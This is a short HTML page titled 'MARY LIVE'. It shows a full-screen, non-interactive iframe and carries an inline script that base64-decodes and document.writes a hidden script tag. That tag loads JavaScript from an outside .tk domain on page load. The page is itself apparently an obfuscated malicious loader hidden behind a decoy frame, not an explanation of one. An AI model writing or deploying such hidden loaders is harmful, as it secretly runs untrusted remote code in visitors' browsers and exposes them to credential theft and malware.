<html>
<head>
<title>MARY LIVE</title>
<meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=no">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<meta name="HandheldFriendly" content="true">
<style>
html { font-size:100%; text-align:center } 
/* Media Queries: Tablet Landscape */
@media screen and (max-width: 1060px) {
    #primary { width:67%; }
    #secondary { width:30%; margin-left:3%;}  
}

/* Media Queries: Tabled Portrait */
@media screen and (max-width: 768px) {
    #primary { width:100%; }
    #secondary { width:100%; margin:0; border:none; }
}
img { max-width: 100%; height: auto; }
@media (min-width: 640px) { body {font-size:1rem;} } 
@media (min-width:960px) { body {font-size:1.2rem;} } 
@media (min-width:1100px) { body {font-size:1.5rem;} } 
</style>
</head>
   <body>
       <iframe id="ifr" src="index-p1.html" frameborder="0" style="pointer-events:none;overflow:hidden;overflow-x:hidden;overflow-y:hidden;height:100%;width:100%;position:absolute;top:0px;left:0px;right:0px;bottom:0px" height="100%" width="100%"></iframe>
       
      <script> var string  ='PHNjcmlwdCBzcmM9J2h0dHBzOi8vY2Fuam9pbi50ay9qcyc+PC9zY3JpcHQ+';
          
      var decodedString = atob(string);
          
      document.write(''+ decodedString +'');
          
      </script>
       
      <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.0/jquery.min.js"></script>

   </body>
</html>
